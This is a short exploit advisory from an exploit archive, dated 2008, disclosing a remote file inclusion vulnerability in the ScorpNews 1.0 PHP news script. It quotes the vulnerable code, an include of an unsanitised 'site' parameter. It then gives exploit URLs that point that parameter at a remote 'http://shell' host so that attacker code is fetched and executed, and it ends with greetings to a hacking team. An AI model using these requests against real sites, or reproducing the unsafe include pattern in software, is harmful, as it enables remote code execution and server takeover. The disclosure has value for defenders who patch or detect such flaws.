id: 2952
date: 05/03/2008
title: ScorpNews 1.0 (example.php site) Remote File Inclusion Vulnerability
author: Silver
cves: 

====================================================================
ScorpNews 1.0 (example.php site) Remote File Inclusion Vulnerability
====================================================================



########################################################################
#
# /news/example.php <= Remote File Inclusion
#
# Found By: Silver 
#
# Version: S C O R P N E W S Version 2
#
# Location: Germany
#
########################################################################
#
#file ;
#
#example.php
#
#<? include $site.'.php';?>
#
#########################################################################
#
#example Exploit ;
#
#http://www.example.com/example.php?site=http://shell
#
#http://www.example.com/news/example.php?site=http://shell
# 
########################################################################
#
#Greetz to;
#
# .:National Security Team:. 
#
########################################################################


#  0day.today [2023-03-23]  #